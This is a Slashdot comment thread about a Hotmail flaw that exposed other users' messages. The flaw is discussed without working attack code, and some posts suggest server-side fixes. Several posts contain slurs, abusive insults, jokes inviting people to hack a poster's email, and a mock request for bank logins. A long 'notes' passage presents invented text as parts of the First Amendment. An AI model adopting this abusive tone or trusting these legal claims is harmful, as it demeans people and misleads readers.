You're a literalist. You might want to have that looked at.

--Blair

decoding hotmail message numbers

[dpilot]

But when you start to consider that the super-duper-top-secret algorithm for encoding message numbers constitutes "encryption" according to some, then it's protected under the DMCA.

You have just published a "Circumvention Algorithm."

Shame on you. No doubt the FBI is on their way to your house to slap you on the wrists with wet noodles. Oops, I mean slap you in irons. The wet noodles are for Microsoft under the new Punitive Actions for the antitrust suit.

Re:decoding hotmail message numbers

[Progman]

No doubt the FBI...

considering the poster is in .cz, I seriously doubt he has anything to fear from the FBI...

Ugly VB Code... yeechhh

[Lizard_King]

you can download the hobo4 program, written by the folks at Root Core to automate this vulnerability here. Warning about the code however:

a) it's in VB

b) you'll see methods like this:

Public Sub ii(MSG As String)

l_info.Caption = ">" & MSG

End Sub

are there no coding standards even among hacks?

My password reminders:

[ers81239]

Q: Who's the man? A: I'm the man?

Does everyone realize that my email is not valuable to anybody but me? I don't email people my credit card numbers!

Plus, any lowlife can get a job washing dishes where he has access to a trashcan full of old receipts with my number on it anyways.

Re:Informative - More like criminal action actuall

[blair1q]

That's okay.

Microsoft's hotmail operation is in flagrant violation of the opt-out provisions of existing privacy laws.

Microsoft sends email to users' inboxes by going around the entire email system, circumventing all attempts to opt out, block, or filter the spam. These emails come from "staff@hotmail.com" and are clearly not normal messages, because they have to power to disable the Reply buttons.

When told they are breaking the law, Microsoft sends back boilerplate that alternately denies the spam is from Microsoft or gives the instructions for the aforementioned nonworking methods of blocking spam.

--Blair

P.S. As it turns out, their monthly spam-o-gram came very shortly after I opened my first--and only--hotmail account, so just about all of the correspondence that has ever transited that account has been my complaints, their responses, and more spam from them. I think the balance is one or two non-microsoft spams and one email from a guy who runs an anti-spam website to whom I'd mailed the long transcript of nonsense that had occurred.

NAZI MODS FUCK OFF

[Rod+Malda]

Slash ain't no linux cult
Slash mean posting for yourself
You aren't slashdork cos you wear thinkgeek
When a mod still lives inside your head

Chorus:
Nazi Mods
Nazi Mods
Nazi Mods...FUCK OFF
Nazi Mods
Nazi Mods
Nazi Mods...FUCK OFF

If you metamod get outta here
You ain't no better than the authors
We ain't tryin' to be geeks
You ain't Jon Katz, this ain't YRO.

Chorus

Ten guys post first, what a troll
You mod each other, Cmdr. Taco wins
Mod me down then you post AC
Post logged in if you got real balls
You still think penis birds look cool
The geek profilers run your schools
They're Taco, bitchslappers and Sims
In slashcode 2, trolltalk was first to go

Chorus

Trolltalk was first to go
Trolltalk was first to go
Trolltalk was first to go...

--Rod "Cmbr. Taco" Malda

Hotmail's pages are insecure anyway.

[Andronicus]

Hotmail's been bare and open to intrusion since it first opened, before SSL secured pages protected the password exchange, and before Microsoft bought them (remember HoTMaiL). When SSL did come about, only the password exchange was secured, the remainder of the session was left as cleartext HTTP. That's how it is today. It's not hard, as others have pointed out, to sniff out anyone's hotmail. Hotmail I believe in their service agreement states that the mail cannot be guaranteed to be private, and you have to accept that if you want to use the service.

So, if you want secured e-mail, do what you'd do on any other mail service, be it web, POP3, IMAP or whatever...PGP the message, and e-mail the PGP cyphertext. Otherwise, they are all just cleartext.

(I was there at the beginning, HoTMaiL's launch on July 4th, 1996.)

Re:Informative - More like criminal action actuall

[Kidbro]

You get a gun (legal where most hotmail servers are located, I believe). You load it with ammo. You point it at somebody's head, and you pull the trigger!

Sue me!

I hope the similarity is obvious...

Re:Informative - More like criminal action actuall

[haruharaharu]

How about Loompanics? They publish guides on such topics as murder and, guess what? They're legal. I recall a court case where somebody sued them because some other person used their guide to commit murder. I think that ended with a ruling that Loompanics was protected.

Now, if writing a guide on how to kill some random person is legal, what would a judge say about a guide to cracking hotmail and reading their email?

Re:Informative - More like criminal action actuall

Actually, they've already figured out that you can use google's translate function to post a goatse.cx link that shows up as [google.com].

Re:Informative - More like criminal action actuall

[legoboy]

Any smart lawyer would know a lot better than to provide unsolicited opinions on legal matters in a public forum. (Yes, it is possible to trace Anonymous Cowards through their IPs, etc). Now go back to your cave, troll.

In what twisted universe is "This is almost certainly illegal, idiots." (to paraphrase) construed as legal advice?

Re:Informative - More like criminal action actuall

[ryusen]

tell that to 2600... despite the moral issue... i would think if this got out enough ms might sue... and right or wrong they've got the money to do alot of damage

Re:Informative - More like criminal action actuall

[tcc]

> and a smart lawyer could argue that the promotion of this item constitues the marketing and or distribution of this illegal material thus making slashdot and its owners accesories after the fact to a crime (yes hacking is a criminal offence with jail terms)

That's playing with words, a smart lawyer could argue.. since you're arguing you consider youself smart? :)

Okay, go sue everyone that has moderation rights here, even those who have it tagged on and don't even know exactly what it is because they barely started reading slashdot, and while at it, sue the school/isp/company on which the computer used to commit such a moderation was hooked, and since we're in the complete nonsence and you obviously don't get what moderation is for, why not sue the company that made the keyboard and mouse with which the CRIMINAL act was commited.

Oh shit, wait! you're probably about to sue microsoft...

>YES I AM A LAWYER

Yeah, and your caps lock is on too. :)

----
Disclaimer

These comments aren't my own, I was playing quake and got owned.

hot dawg

[RoLlEr_CoAsTeR]

Now I have something to do tonight.. heh

though, seriously... mm, that's not good. On a side note, I wonder how many of us have accounts at places such as hushmail.com ?

Re:Informative - More like criminal action actuall

[l33tsp34ker]

http://dailynews.yahoo.com/h/zd/20010813/tc/court_ posters_ids_can_stay_under_wraps_1.html

It would seem that anonymous really is anonymous

Re:Informative - More like criminal action actuall

[cancrman]

Dude, you're getting a FREE email account hosted on their servers. I cannot believe you are bitching about a MONTHLY email that they send you. There are tons of other free email services out there. Why don't you use one of those and quit wasting your time tilting at windmills. Or are you just looking for some easy Microsoft bashing mod points?

Hotmail sucks (more) since the redesign anyway.

You are a sick piece of shit

[Listen+Up]

Fuck you for linking to something so fucking disgusting. You are a piece of shit.

"hacker" vs. "cracker": something to consider.

[Wakko+Warner]

Does anyone else think that "crackers can read your email" is something Chef from South Park would say?

CHEF: Now, children, don't leave your computer on when you're not around! Crazy crackers can read your email!

STAN: Holy crap!

CARTMAN: You guys are so lame.

- A.P.

Re:Informative - More like criminal action actuall

[Divine_Karma]

My thoughts exactly! Except you worded it a hell of a lot better than I could

haha

[No-op]

My god that's totally hilarious. someone please mod this guy up :)

legal stupidity

[mj6798]

That may or may not be the actual current legal situation. But I find it unacceptable to attempt to protect every kind of incompetence by service providers under computer crime statutes.

Hotmail's actions are negligent and show a callous disregard for the privacy and security of their user's data. This particular security hole is not even an acciedental mistake, it is plain incompetence. That kind of incompetence must be exposed and Hotmail and its officers should be held liable under civil and possibly criminal statutes.

Under your kind of reasoning, institutions like Consumer Union would not be able to point out security defects in commonly marketed devices or services. This is simply not acceptable, and if your statements represent current legal theory, the law needs to change. Consumers need this kind of information.

Re:Informative - More like criminal action NOT

[the+gnat]

Perhaps your middle school doesn't have email accounts and you have to use Hotmail, but the mere fact that you have a Hotmail account- which, apparently, you use at least for unimportant stuff- means Microsoft has one more user to brag about to advertisers. Obviously it isn't such a big piece of shit, or you'd use Yahoo! or some other free webmail service.

If you're really concerned about Microsoft's lack of security and quality control, don't buy their software or use their services. And it's the problem of millions of users like you who use Hotmail, many of whom either don't have much of a choice for email accounts or were using it before MS took over. Lastly, exploiting the flaw won't make them fix it any faster than they are right now. It'll just get criminal charges pressed against a few script kiddies, and rightly so.

Personally, I think anything beyond Pine is overkill. Not everyone is lucky enough to have email accounts on Unix servers, though. Passport sounds like an absurdly awful idea, but I don't think anyone could do it right. I'm worried about Microsoft taking over the Internet, but I don't think they'd necessarily do a worse job on Passport than, say, Sun. There's not a lot of practical work done so far involving such massive systems, and I don't think they've thought it through very clearly beyond the marketing department.

Re:Informative - More like criminal action NOT

This is the stupidest post I've read in many, many moons -- even for a Slashbot.

Which brings up the obvious question: where's the +3, informative moderation?

Re:Informative - More like criminal action actuall

[targo]

Microsoft sends email to users' inboxes by going around the entire email system, circumventing all attempts to opt out, block, or filter the spam. These emails come from "staff@hotmail.com" and are clearly not normal messages, because they have to power to disable the Reply buttons.

Your hate is clearly blinding you. I have been a hotmail customer for about three years and I have received about 5 or 6 messages in this time from staff@hotmail.com, and they have always been about feature changes or other information that actually is relevant to the service. IMO this is a very low price to pay for a free service and it is EXTREMELY low compared to most of the other free services that usually spam you couple of times a week with totally non-relevant messages.

Re:Informative - More like criminal action actuall

[alanjstr]

Its already all over the web. I read it at The Register hours ago.

Put this on a T-shirt!

Just like DeCSS! XXXL I'm sure, but we're talking coders here, so it should fit well.

Dear Hotmail Programmers

[vodoolady]

Please check the user's id next time you fetch a message. Thanks!

Re:Go with Yahoo! Mail. (OT)

[Ansonmont]

Also, with Yahoo mail you can use any real (non-web based) email client to download your mail so you don't have to use their interface, then when you go on vaction you turn your automatic email collection off and you can access your email from any device which allows you to surf the web. Just go to the options page and find out your incoming and outgoing SMTP and their POP stuff.
-A

Re:Informative - More like criminal action NOT

Say, does anyone want to hack into this guy's email?

Is there any FreeBSD left on Hotmail?

[jackDuhRipper]

Greetings, all -

What's the latest on the migration from FreeBSD to W2000? Is that totally complete?

If not, were any BSD boxes compromised?

(No mention of that on 'securityfocus.com', either ...)

Steve

Re:Is there any FreeBSD left on Hotmail?

[The_Messenger]

None of the boxes were cracked. This is an issue with the Hotmail software itself. And I wouldn't be surprised if this "bug" (read: design flaw) predates Microsoft's ownership. After all, if it were a Microsoft bug, it would include a root exploit. :-)

Given that this "bug" simply uses Hotmail's poor design against itself, this doesn't even qualify as "cracking." Thus, Taco's title, "Hotmail Hacked," is perfectly valid.

Re:Informative - More like criminal action actuall

[q-soe]

Good point on that - but the laws on computer crime are different arent they ?

Still you might be right - but would this not depend on the jurisdiction ? - if the case was in the New York Courts but Slashdot is based in say California it might not neccesarily be precedent setting as its not a federal case ? I dont know as i am not a lawyer but it would be interesting to know as this is a valid question

Probably not the first to say this.

This isn't a new hole. It has been known for over a year and nobody has done anything to fix it. Maybe Microsoft will actually be responsible enough to fix it this time. Anyway, you can also view deleted emails using this technique as well.

Re:Informative - More like criminal action actuall

[q-soe]

Actually i have had hotmail accounts for years and have also had accounts on other providers of free mail services.

Yahoo was spam city - it may not be hackable but christ did i get spammed - and emails from yahoo 'affiliates' were a constant problem - even though i asked them not too
RocketMail - not bad - but now gone
Altavista - More porn spam than you can poke a stick at and mesaages from them every day

Thats a fee examples

Hotmail used to be bad - but over the last 8 months with the account i have i average 1 spam a week (those dammned college degree ones) and 1 message a month from hotmal staff - i get little other spam and the filters work - its also fress so who cares about 1 little message - and the address is a non reply - i have them here on my system for helpdesk and notification purposes - its not 'power' it's a standard thing.

Do you use hotmail daily these days ? (just wondering not flamebaiting)

Yes, but.....

[rppp01]

Smart and lawyers is like Stable and microsoft. They just don't go together very well.

Re:Informative - More like criminal action actuall

get caught - then you will see how criminal it might be

Re: Hotmail hacked!

Don't worry, I've just read your mail and it's not that interesting.

Re:Informative - More like criminal action actuall

Im not offering legal advice - just posing a possible alert - i have not acted or paraphrased this as legal advice and for it to be held up as legal advice in a court of law i would need to state my name, law firm and where i am registered to the bar as a minimum.

remove head from arse my friend - i was trying to maker a valid comment that might help out here - i read /. because i have a hobby of tech. i was making a point (and i do criminal law for a living) to try and help out and maybe avoid a possible action.

So i'm not willing to list my name and give you an email address to flame me on cause i might nor agree and also to risk my Career.

OK heres a dislcaimer.

ANYTHING YOU READ IN A PUBLIC FORUM DOES NOT AND CANNOT CONSTITUTE PROPER LEGAL ADVICE - YOU SHOUDL ALWAYS SEEK AN OPINION FROM A LAWYER YOU CAN TRUST - THIS IS AN OPINION ONLY AND COMES UNSOLICITED AND THUS IS NOT A LEGAL STATEMENT.

Happy ??

Now next time please refute my post instead of attacking my possible credentials ? i dont need to post a transcript anymore than i need to ask you what you do for a living.

Oh and the IP would not really help you - where would you trace it to - the ISP who provides my services ? i dunno as i havent posted under MY NAME and the firm i work for has a proxy with a fixed IP and internal IP is not logged(i could be anyone of 1500 staff here) what would you do - i am as entitled to post an opinion here as you are - and thats what i posted an opinion.

Re:Informative - More like criminal action actuall

[shaunak]

"whilst Slashdot don't censor their posters (free speech is something i'm all for) allowing this to be moderated up shows the sort of people that this site is being controlled by "

Um, moderators do not control slashdot. Moderators are volunteers, and as such, they do not own slashdot. IANAL.

Ever heard of the *FIRST AMENDMENT* ???

[SirNonya]

You have the right to say absulutely anything
you so desire to say. It is guarenteed in the
constitution:

[Whips out TI-86 to get ab ebook]
Ok, this kills the DMCA and your argument:

From the constitution of the United States of America:

"Amendment I
Congress shall make no law respecting an establishment of religion, or prohibiting the free excercize thereof; or abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble, and to petition the government for a redress of grievances."

If you have any problem understanding the above quote, grab a dictionary, and look up the words (abridging).

~SirNonya!

Re:Ever heard of the *FIRST AMENDMENT* ???

Ahhh what POINT does that cover

Establishment of religion and free exercize of it - nope this is not a religion
Freedome of speech - check the other amendments to this and the laws of the federal government - it was established over 100 years ago that freedom of speech (first amendment rights do not cover criminal actions as defined by a court of law - they cannot claim fifth amendment rights as IMHO as they have already incriminated themselves.
Free press - yep and im all for it - that would theoretically mean that /. is safe if they can argue they are an authentic member of the press, - doesnt protect the poster.

The others dont count as they dont apply here.

I dont have a problem with it - i studied all the articles in depth at law school and understand them - trust me you are not protected under the first amendment from criminal prosecution - otherwise you could cut someones heart out and use their blood to paint a picture and claim it was art and covered under freedom of speech

You (and a lot of other posters here) need to do a little research in law books on the first amendment, indeed the entire constitution - you will get a big shock.

OH and to the guy who said it's protected under parody - this is clearly not parody and the laws as it applies are not clear and thus it would be tested in a law court - lets see the facts - hackers who broke into a corporate system VS government prosecutors and a conservative court.

Guess who wins

you guys need better trained monkeys...

[edgrale]

because I submited this story [ The Register version ] a few hours before this guy and it was rejected... go figure!

Time to...

[NotoriousQ]

Get that "I READ YOUR EMAIL" tshirt out of the closet again.

But more seriosly, these guys came up with nothng really new. Basically it presents a challange for an ASP (that is what they are running, mod me down if I am wrong) system to work with full NT accounts. It in much easier to create a single log in to the DB backend and then just spit out an rs of all the things tied to a user id. So essentially to make this secure, the display page (one that displays the complete text) would have to confirm user id every time the page is pulled, istead of just pulling the one with the given guid. That is damn simple to do, but it actually requires more work, and almost all companies would not bother. So check all those email services that use single account with users stored in db, and you will find plenty.

IMHO it is a 5 min bugfix:

If hash(rs!User) != request("user") then 303 Forbidden

Instead of just pulling the email.

Disclaimer: The above is NOT pure ASP even though it is similar. I also do not remember if 303 is forbidden.

Re:Time to...

[WildBeast]

in ASP

If session("username") request("username") then

response.write "Forbidden"

end if

I'll get that "I don't work here" tshirt out of the closet.

Re:Time to...

[WildBeast]

in ASP
If session("username") != request("username") then
response.write "Forbidden"
end if

I'll get that "I don't work here" tshirt out of the closet.

Re:Ugly VB Code... yeechhh

[The_Sock]

Some of the most beautiful hacks have come from some of the ugliest code.

That one does not fall into this catagory though.

Re:Informative - More like criminal action actuall

[Sarcasmooo!]

Lawyer or no, you should understand that consumers' rights supercede a business' rights, and when a problem like this is ignored for "3 days" I hope the exploit is on the evening news until it's fixed. The only possible defense I can see for hotmail is to say that they provide a free service; but they provide a service where people pay with their personal information, which is sold to advertisers. Given that you are a lawyer, you should be looking to change things like this for the better instead of demonizing the spread of information. I might've been able to sympathize if you had at least insulted the people in other posts who actually claimed to be doing the cracking.

"allowing this to be moderated up"

allowing this to be moderated up shows the sort of people that this site is being controlled by

Slashdot also allows it to be moderated down.

But it hasn't been. Meanwhile, you have also
been moderated up. How contradictory!
What do you make of this?

Lawyers can't see the forest for the trees.
It's no wonder people hate them.

Perpective:

[Donut]

Major Security Hole (real world):

name: Field
pass: Service

Major Security Hole (Slashdot World):

"...Microsoft..."

Just making sure I get this right

blow it up!

[sewagemaster]

first hotmail is hacked...
next, hotmail's slashdotted..

AHA! that's it! veee mussst stop access to all, and zat should stop anyone hackin eeet!!

Stop me if you've heard this one...

[bigbadwlf]

That reminds me....

What do you call 100,000 lawyers at the bottom of the ocean?

It's how they test windows security

[Nutt]

Every time they want to test a security update they try it on hotmail first to see if it works :)

Oops. Looks like hotmail'ss been cracked. Better not release our 700000th security update.

microsoft?

as i recall... hotmail wasnt created by micrsoft

BFD

[ErikTheRed]

All you can do is read other people's spam.

Re:Informative - More like criminal action actuall

ur a microshit lover arent you you gay bastard

Looks like MS fixed it...

It now asks for validation of your password before it takes you to the message..

After you type it in, it still takes you to the same error message as before though, so it may not be a real fix..

It does make the bot released by root-core pretty worthless though :P

Use encryption.

[LeyDruid]

All the more reason to use PGP. Doesn't get much easier than that...but still nobody uses it. How frustrating.

Later,
Goss

Congratulations, you are now part of the problem.

[TheMCP]

This is a discussion of a security problem. The primary topic I see in the messages is "how serious is this bug anyway", and in order to make a determination of that the participants need to discuss how easily the bug can be exploited. This topic is an integral part of the discussion of the bug, and is essential whether the discussion is intended to be strictly academic or in order to actually cause hacking.

I, for one, found this discussion to be technically informative, in that it helps me to understand the current level of Microsoft's security thinking, which helps me (as a technical professional) to form an opinion regarding how worried I should be about using Microsoft products in my work.

So, what this comes down to is that you're claiming that it's illegal to disseminate this information, but at the same time there is no other way to discuss the subject for legitimate purposes. Federal law versus First Amendment. Which one do you think wins?

It's people like you, who think you can legislate away the right to talk about things, to take away first amendment rights, who are the problem. Keep it up and pretty soon there will be no computer security because nobody will be able to talk about it.

Re:Informative - More like criminal action actuall

Hmmm, I've got three yahoo accounts and the only one that catches spam is the spamcatcher one (and never from yahoo themselves, tho YMMV on that one) Maybe 'q-soe' is a little too easy for the dictionary attacks.

Notes on this

I post this without comment - some notes i have here on some components of the first amendment

3. The freedom of speech:

a. The absolute freedom of engaging in or refraining from speech and non-verbal communication, and receiving or refusing to receive information, without any coercion, shall be a rebuttable presumption in any administrative or judicial proceeding, concerning any attempts to abridge them. The onus of rebutting this presumption shall rest entirely on the party seeking such abridgment, by showing that the speech or non-verbal communication sought to be restrained, or the information to be withheld, do not, by virtue of some other conflicting and overriding considerations or necessities, fall within the categories of freedoms that this section is intended to protect;

b. Any Congressional, State, or local legislation or regulation by any governmental authority, which is so imprecise, ambiguous, vague, overbroad, or excessively general in its terms that it provides a pretext for arbitrary or discriminatory law enforcement, uncertainty in the minds of persons of common intelligence as to the limits of protected communication, and creating a chilling effect on the unrestrained exercise of freedoms clearly not proscribed, shall be wholly void on its face; except that insubstantial defects may enable the courts to merely sever unenforceable parts or specific applications thereof;

c. Prior restraint shall not be imposed on any communication by institutionalized or informal censorship or coercion, however subtle, unless, in each instance such restraint is sought, a fair judicial hearing, following proper notice, is held; except where the required delay may cause irreparable harm, upon which a temporary restraining order, subject to a prompt subsequent hearing, may be issued;

d. Maintaining the integrity of the judicial process may validly require in-court and out-of-court curtailments on communication and information to prevent the clear and present probability of serious interference therewith;

e. The free and uninhibited conduct of any electoral process shall not be interfered with, unless the integrity of the process itself is, or appears to be, threatened, or where its integrity is protected or enhanced thereby;

f. In order to maintain the reliability and preparedness of the armed services, restrictions on communications and information likely to reduce the effectiveness of response to command may be justified therein;

g. Inmates of penal institutions and preconviction holding facilities shall retain the freedoms granted herein to the extent that their exercise does not endanger prison security and order, and any limitation imposed, however warranted, shall be in accordance with properly defined and administered procedural safeguards;

h. Public employees or licensees may be required to take such oaths or affirmations as are necessary to obtain their commitment to the lawful performance of their functions, or to make disclosures about themselves, as a condition of their office or employment, that are crucially relevant, lawful, and not repugnant to the letter and spirit of this Constitution;

i. Fighting words that tend to incite immediate violence, offensive speech to a hostile, potentially violent audience, false statements likely to cause panic, disorder and safety hazards, advocacy aimed at inciting or producing imminent lawless action and is likely to succeed shall not be protected under this section;

j. Untrue defamatory speech (slander) or other communication (libel) is not protected herein; but the baseless defamation of public officials respecting their official conduct and of public figures respecting matters related to the causes or circumstances of their fame or notoriety, or a public controversy in which they willingly participate, shall, in the absence of malice (requiring communication knowingly false or recklessly disregardful of its truth or falsity), be protected;

k. Sexual conduct described or depicted in a patently offensive manner, lacking serious literary, artistic, political or scientific value, and the dominant theme of which would appeal to the abnormal, prurient sexual interest of the average normal adult person, as determined by the application of contemporary standards of a given relevant geographically circumscribed community, shall be assumed to be harmful to society, and be outweighed by the need to protect the social interest in preserving, or not blatantly offending, recognized, generally approved norms of morality; and in the application of this clause, the corruption of minors, by exposure to obscenity, or their use in its description or depiction, shall be an aggravating factor supporting the denial of the freedoms herein granted. But the foregoing notwithstanding, no law proscribing pornography in any form, except child pornography, shall be made, that invades the personal right of privacy exercised in non-public places;

l. Public property open to the public shall be available for the exercise of freedoms herein granted, subject to reasonable, non- discriminatory, content-neutral regulations serving some significant government interest not otherwise attainable, concerning the orderliness, public safety and convenience, and personal right of privacy aspects. of any such exercise, by determining, on the basis of unambiguous, non-discretionary guidelines and procedural safeguards, the time, place and acceptable manner thereof. Private property open to the public, depending on the extent and exclusivity of its use, and its relevance in the public life of a community, may, subject to judicial determination, be required to partially accommodate the exercise of freedom of communication and information, or even be considered the equivalent of public property open to the public. But in either case, where a total ban on expression is lawfully applied in any public place, or by any medium, assurance of a satisfactory alternative place or medium shall be provided to ensure that such a ban does not result in suppression of the exercise of anyone's right of expression, or a community's right to receive information intended to be conveyed; and in any limitation of or ban on the exercise of such freedoms, the burden of showing just cause will rest entirely on the party seeking to impose it; and

m. Commercial communication primarily concerned with promoting commercial transactions may, in order to serve a substantial government interest, be subjected to reasonable limitations on the grounds of confusing or deceiving the public, or to banning, if false, misleading or otherwise illegal, and the communicator may be required to carry the burden of showing cause why protection under this section should not be withheld.

4. The freedom of the press:

a. All freedoms and limitations thereof described in the previous section shall apply to all media of information as well;

b. The laws of defamation, especially those applying to private individuals, shall be construed and applied against information media defendants in such a way, that their special responsibility for fairness and the avoidance of malice, negligence, and damaging reporting due to incompetence, be given due weight;

c. The communication of obscenity through the information media may be subject to special sanctions and restraints where it involves the invasion of privacy, or ready access to minors; but distributors, sellers and other facilitators of the conveyance of information media products in any form shall not be discouraged or chilled in their freedom to contribute to the maintenance of a free market of information and ideas by burdening them with an absolute presumption of knowledge of the contents of all information that they carry;

d. The preservation of a fair criminal trial by a ban on media reporting shall require virtual certainty that such a ban is essential and would in fact safeguard the rights of the accused, and that there is no viable alternative way of affording such protection; but the right of privacy of jurors concerning non-relevant facts and circumstances may be afforded reasonable restraints on reporting; and there shall be no automatic or non-consensual right to interview the accused or a convicted prisoner in a penal institution as long as some alternative channel of requesting information from an incarcerated person remains open through which the prisoner may choose to respond;

e. News-gatherers shall not be granted any privileges or immunities, or greater protection than any other person under the freedom of communications and information provisions herein, however, their need for continuous reliance on news sources requires special consideration on the part of public officials, in order not to disrupt the availability of such sources, or to harass or inhibit their activities in any unlawful or unreasonable manner;

f. In grand jury proceedings news reporters shall be required to give evidence and reveal the sources thereof in the manner any other witness may be compelled to do, and their offices may be searched in accordance with the requirements of the Fourth Amendment herein, however, in authorizing and carrying out each such search, special care must be taken to preserve the confidentiality of information concerning, persons and matters not targeted thereby;

g. Information media conveying its information on publicly-owned property subject to physical limitations, such as the airwaves, shall be subject to governmental licensing and regulation on a fair and equitable basis, solely in the public interest. Any governmental, political or economic interest not in harmony therewith shall have access to judicial review;

h. The acceptance of political or election campaign advertising in any medium of information shall not be compelled, but editorializing on political and other controversial public issues shall be subject to regulation prescribing fairness and balance in news media otherwise subject to licensing and regulation;

i. Government regulation aimed at preventing the monopoly of available public sources of information in a given geographic area may properly be applied to any medium or combination of media of information;

j. In the absence of a compelling State interest, any tax extractable exclusively from any one medium, or all media of information, shall be presumed to be a covert attempt to censor or penalize the press, and to interfere with the public's right of access to independently and freely provided information.

5. The freedom of association:

a. As a general rule, the freedom to associate or refuse to associate, without coercion, and to petition, individually or associated with one's peers, the government of the United States or any State or local government, for a redress of grievances, shall not be abridged; and the freedoms and lawful curtailments thereof described in section 3 of this article shall apply to associations of various forms as well;

b. Membership in, or collaboration with, associations the aims or activities of which are unprotected by this Constitution, shall not be considered prima facie evidence of identification with such aims or participation in such activities;

c. Membership in or collaboration with associations engaging in illegal advocacy or activity may carry the presumption of sharing in the association's culpability where a member or collaborator possesses specific knowledge of such advocacy or activity and a clear intent that the aims be reached or the activities be carried out;

d. Associations engaged in unlawful advocacy or activity may be compelled to disclose the names of their members if such disclosure is essential to serve a substantial governmental interest; and individuals may be required to disclose any such membership as a relevant and essential condition of their public office or employment or membership in validly licensed professional bodies;

e. Absent a compelling governmental interest, political parties shall have absolute freedom from interference in their internal affairs;

f. In order to promote harmonious labor relations, simple majorities of employees may designate or form a union as a sole bargaining agent, and compel non-members to pay dues, and abide by agreements reached on their behalf. However, their dues shall be used solely for collective bargaining activities, and their right to communicate independently with their employers shall not be denied;

g. Non-coercive, peaceful picketing or boycotting intended to publicize economic or labor disputes, or the alleged denial of rights guaranteed by this Constitution, shall be protected;

h. Inmates of penal institutions may be denied their right of association, including the formation of or participation in any prison unions;

i. Political activity or party affiliation of public employees, unless specifically in conflict with the effective performance of their functions, shall not be regarded as a disqualification for public employment; and

j. Demonstrations and meetings in public places shall be conducted within the framework of subsection 1 of section 3 of this article.

request for mrs. Hacker

[Arleo]

Dear mrs. Hacker,

If you are able to enter my hotmail-inbox, would you be please so kind to delete those 300 spam messages after you've read them?

Thank you so kind

Arleo

Baaah!

[quintessent]

If you want my hotmail password that bad, just ask. I'll send it to you and save you the trouble.

Re:Baaah!

[Malcontent]

Why not post it here?

I can make it up

[Oshuma.Shiroki]

"No I'm not kidding. You can't make that stuff up."

Um, yes you can. "hey mr comdrtaco my techer is L4M3!!!!!1 can u hack his emali acount so i can red teh test ansers???????"

Boo-yaa! Fooled you, I just made that up. ;)

Indeed

[RoLlEr_CoAsTeR]

It's about time they told us something we DON'T know about Hotmail, eh?

Re:Informative - More like criminal action actuall

YES I AM A LAWYER

If you are, you're a very bad one.

Now you can be a hacker too

[RPoet]

Just read this l33t article on "How To Become a Hacker", and you'll be hacking into people's mail before you know it!

Bah.

[crucini]

From the story:

In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said.

Experts? Experts who think you need real-world authentication to log into hotmail?

"The average person in the street doesn't need to worry, as they would have to be specifically targeted," said Graham Cluley, an Internet security expert with antivirus firm Sophos.

I'll just leave my door unlocked because it's not a problem unless I'm specifically targeted.

Anyway, if you're going to write a web page that cites other web pages, please put in a link. The anonymous authors of this page ("Tech Live staff") neglected
to link to Root-Core, which seems to be the focus of the story, although they linked to Sophos, which was tangential.

And this was on Bugtraq on Saturday.

Need new e-mail help!

[CutCopyPaste]

Are there any good free e-mail services out there im sick of using hotmail and even more now that they that IMHO ugly win XP look.

Re:Informative - More like criminal action actuall

[crucini]

Not disagreeing with you, but that post seemed to be a paste from a message on Bugtraq on Saturday. Bugtraq always has full disclosure exploits. Why hasn't this legal theory been applied to Bugtraq yet, as they are quite high profile?

Thats fine...

[max_power26]

because I think everyone has the right to know how to enlarge their penis by as much as 25%! Sorry but i had to put this link in here from one of my confidential hotmail mails. That electrical thing looks very dangerous.

No, you really can't make this stuff up

[Wee]

Speaking of choice remarks, Mr. Gates once mentioned a problem about factoring prime numbers. Yeah... I seem to recall some difficulty there... something about making better cryptographic numbers... yeah... to enhance security... yeah... with large primes and their, um, factors...

So what MS product got hacked again?

Re:Informative - More like criminal action NOT

Is english your first language ?
The software isnt running on a windows system as it has not been transitioned from free BSD fully yet - the exploit is nothing that you may not find in other systems non MS - i havent looked

Im not going to comment on the peice of shit post - thats a matter for opinion

If you use that argument for an excuse to hack a commercial system then when and if you get arrested you will get a very scary shock.

'I only broke into that persons house cause the brand of lock they use is faulty and i thought that stealing their TV would show them they needed to fix it'

Many many people use hotmail for many things - they have a reasonable expectation of security and dont need morons like you breaking into it for the hell of it

2 exploits in lets see how many years has it been up, about 8 so 2 exploits in 8 years means it has been hacked less often than the FBI, CIA, Yahoo, etc etc - hardly a seriously unsafe system.

You sir are the dumb ass - and i suspect you are 12 years old and writing this on a win98 box at school

News ITem about Microsoft will be...

[StarTux]

When it has *not* been hacked!

StarTux

This story is clearly off-topic!

"Slashdot - News for Nerds. Stuff that matters"

• Is it news that Hotmail is insecure?
  
• Does anyone actually care?
  

So what the **** is this story doing on Slashdot?

Dangerous Condition

[Tony-A]

To borrow from you analogy, the real risk is not so much the lunatic that throws a match into the leaking gasoline as some innocent bystander that light up a cigarette.

Dear Friends

[danger42]

Please send me your bank account numbers and paypal login/password so that I can make sure they are authentic.

-matt@hotmail.com

I wish ....

I wish the Slashdot articles showed the year in the date. I can't tell if this is a new article, or if it is a repost from last year.

Oh no...

[Pedrito]

Now someone's going to get into my hotmail spam account and be able to read all my spam. What to do?

I mean, really, does anyone use hotmail for anything other than a spam repository?

LMAO

Somebody tell me what I've got to do to get mod points, this post makes it all worth while!!!

--AC

Re:Informative - More like criminal action actuall

No, I think if people can get away with setting up a website to organize the murders of Abortion Doctors than posting how to hack into hotmail might be legal too... But then again Kevin Mitnick went to jail longer than most rapists....
Sometimes I wonder if I'm in the right crime business.

And No, You are not a Lawyer. (I read your hotmail.)

~Anonymous Coward

When you put something under the microscope...

[kin_korn_karn]

...you will see more detail, naturally.

hackers and the geek community (for lack of a better phrase) hate MS, which means they target MS for hacking, which means that, eventually, they will find holes.

I hate MS as much as anyone else that's reading this thread, but if there was a community of MS zealots and hackers that hated open-source products, and took it upon themselves to hack Slashdot, redhat.com, sourceforge, and all the other major OSS-scene sites, there would be quite a few security holes found there, too.

Glass houses, people..

- JW

First dead Nietzsche post

yeah more more more dead Nietzsche.

That hot philosophy scene on boring TV last week caused me to pop my brain!

Dear ColdDeadMail -

[gelfling]

Just give up. Seriously. You tried you failed repeatedly you continue to suck. You are the IUD of the internet. Utterly incabable of taking care of yourself and completely unloved. Just kill yourself and go away.

I don't care

[TheFlu]

I'm all for a security hole in Hotmail if I can get the crackers to somehow delete the 100 pieces of spam I get to that account everyday.

Re: Hotmail hacked!

[zorknorobot]

Ha ha. Funny. I see are making a comment about the dullness of my reply to the article. Know what? I don't care if I interest you...after all you are an anonymous coward.

